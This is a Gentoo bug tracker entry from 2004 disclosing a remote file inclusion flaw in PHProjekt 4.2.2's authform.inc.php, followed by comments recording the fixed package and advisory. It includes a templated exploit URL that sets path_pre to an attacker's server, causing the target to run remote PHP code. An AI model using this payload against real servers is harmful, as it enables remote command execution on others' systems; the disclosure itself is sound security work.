Bug List: (This bug is not in your last search results)   Show last search results      Search page      Enter new bug
Bug#: 75858
Alias:
Product:
Component:
Status: RESOLVED
Resolution: FIXED
Assigned To: Gentoo Security <security@gentoo.org>
Hardware:
OS:
Version:
Priority:
Severity:
Reporter: Phil C. <z3hp@yahoo.com>
Add CC:
CC:
Remove selected CCs
URL:
Summary:
Status Whiteboard:
Keywords:
Flags: Requestee:
 
 
  ()

Filename Description Type Creator Created Size Actions
Create a New Attachment (proposed patch, testcase, etc.) View All

Bug 75858 depends on: Show dependency tree
Bug 75858 blocks:

Additional Comments: (this is where you put emerge --info)


Not eligible to see or edit group visibility for this bug.






View Bug Activity   |   Format For Printing   |   XML   |   Clone This Bug


Description:   Opened: 2004-12-27 17:05 0000
The script authform.inc.php does not properly validate user input allowing a
remote user to define the global variable $path_pre to cause the script to
execute arbitrary PHP code from a remote server. This allows a remote user to
execute operating system commands with the privileges of the target web server.

Example Exploit: http://%s/%s/lib/authform.inc.php?path_pre=ht tp://%s/

Reproducible: Sometimes
Steps to Reproduce:
1. Browsing to: http://%s/%s/lib/authform.inc.php?path_pre=http://%s/
2.
3.

Actual Results:  
The target server execute PHP code from the remote server.

Expected Results:  
Not include remote PHP code by properly validating user supplied input

Website: http://www.phprojekt.com/
Affected: PHProjekt
Version: 4.2.2
Vulnerable file: authform.inc.php
Discovered date: 2004-12-10
Disclosed date: 2004-12-27
Vendor notified: Yes
Disclosed by: Phil C. (phil.c@cytechnet.com)

Summary:
The script authform.inc.php does not properly validate user input allowing a
remote user to define the global variable $path_pre to cause the script to
execute arbitrary PHP code from a remote server. This allows a remote user to
execute operating system commands with the privileges of the target web server.

Vendor Status: Fixed
Current Version: 4.2.3
Patch: http://www.phprojekt.com/files/4.2/lib.zip

------- Comment #1 From Sune Kloppenborg Jeppesen 2004-12-28 00:00:12 0000 -------
web-apps please provide an updated ebuild.

------- Comment #2 From Stuart Herbert (RETIRED) 2004-12-29 03:44:51 0000 -------
I'm looking at this now.

Best regards,
Stu

------- Comment #3 From Stuart Herbert (RETIRED) 2004-12-29 05:01:48 0000 -------
Fix committed, and marked stable on x86 and ppc.

Best regards,
Stu

------- Comment #4 From Thierry Carrez (RETIRED) 2004-12-30 06:34:01 0000 -------
GLSA 200412-27

Bug List: (This bug is not in your last search results)   Show last search results      Search page      Enter new bug